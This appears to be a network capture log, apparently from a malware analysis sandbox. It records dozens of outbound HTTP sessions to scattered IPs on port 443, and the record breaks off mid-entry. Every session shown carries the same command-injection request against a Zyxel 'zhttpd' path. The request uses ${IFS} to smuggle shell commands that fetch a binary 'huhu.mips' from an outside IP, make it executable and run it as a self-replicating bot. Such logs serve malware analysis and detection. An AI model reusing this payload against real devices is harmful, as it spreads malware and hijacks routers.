                                            Feb 2, 2024 06:21:20.789537907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6292192.168.2.15406329.186.78.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789591074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6293192.168.2.1551650219.228.40.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789618969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6294192.168.2.1548824165.105.126.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789669037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6295192.168.2.1547764106.135.63.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789681911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6296192.168.2.1556782151.141.10.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789716959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6297192.168.2.154096019.165.89.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789748907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6298192.168.2.155267067.194.109.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789814949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6299192.168.2.154871245.98.208.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789833069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6300192.168.2.1534802118.55.133.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789876938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6301192.168.2.1534714220.31.88.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789921999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6302192.168.2.154708236.201.182.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789947987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6303192.168.2.1559804160.173.45.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789983988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6304192.168.2.1536104216.58.179.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790034056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6305192.168.2.1534676169.221.200.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790054083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6306192.168.2.154818223.51.64.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790115118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6307192.168.2.154210882.233.22.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790168047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6308192.168.2.155003699.125.85.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790216923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6309192.168.2.1550164140.33.176.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790266991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6310192.168.2.155608220.190.171.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790287971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6311192.168.2.1557852146.42.137.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790329933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6312192.168.2.154547053.91.246.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790371895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6313192.168.2.1552856190.147.101.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790419102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6314192.168.2.1544014190.219.227.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790466070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6315192.168.2.1532944208.145.216.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790502071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6316192.168.2.154684849.150.114.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790527105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6317192.168.2.1557422171.138.30.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790560007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6318192.168.2.1556716185.45.111.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790601969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6319192.168.2.154593812.80.253.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790642023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6320192.168.2.1555188178.157.225.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790678024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6321192.168.2.1557692171.120.32.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790720940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6322192.168.2.1559882164.226.224.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790765047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6323192.168.2.1552614209.165.45.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790786028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6324192.168.2.1540842152.195.89.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790853977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6325192.168.2.1544468219.71.166.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790888071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6326192.168.2.154053873.231.64.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790932894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6327192.168.2.1546692142.176.119.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790975094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6328192.168.2.155711060.95.230.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.790992975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6329192.168.2.155613685.230.139.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791040897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6330192.168.2.1547238139.68.161.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791079044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6331192.168.2.153511871.105.249.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791115046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6332192.168.2.1560310117.198.189.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791158915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6333192.168.2.1554568119.191.44.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791198015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6334192.168.2.1537342217.103.119.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791248083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6335192.168.2.155848091.184.174.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791292906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6336192.168.2.155418076.140.248.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791306019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6337192.168.2.1538182222.119.236.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791348934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6338192.168.2.154821683.245.159.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791389942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6339192.168.2.155444827.14.182.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791423082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6340192.168.2.154478827.236.65.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791445971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6341192.168.2.15478282.227.62.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791479111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6342192.168.2.1554432118.234.255.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791495085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6343192.168.2.1536362122.156.32.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791542053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6344192.168.2.1556158119.136.19.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791596889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6345192.168.2.1533730183.116.135.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791655064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6346192.168.2.1556684145.40.191.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791666985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6347192.168.2.153999284.60.140.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791712999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6348192.168.2.155860648.82.33.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791768074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6349192.168.2.1559776191.215.230.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791805029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6350192.168.2.1560150121.165.10.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791848898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6351192.168.2.1560442162.242.5.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791876078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6352192.168.2.154747243.254.60.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791912079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6353192.168.2.156024695.176.205.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791964054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6354192.168.2.153451824.95.121.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.791981936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6355192.168.2.1558486164.196.18.220443
                                            TimestampBytes transferredDirectionData
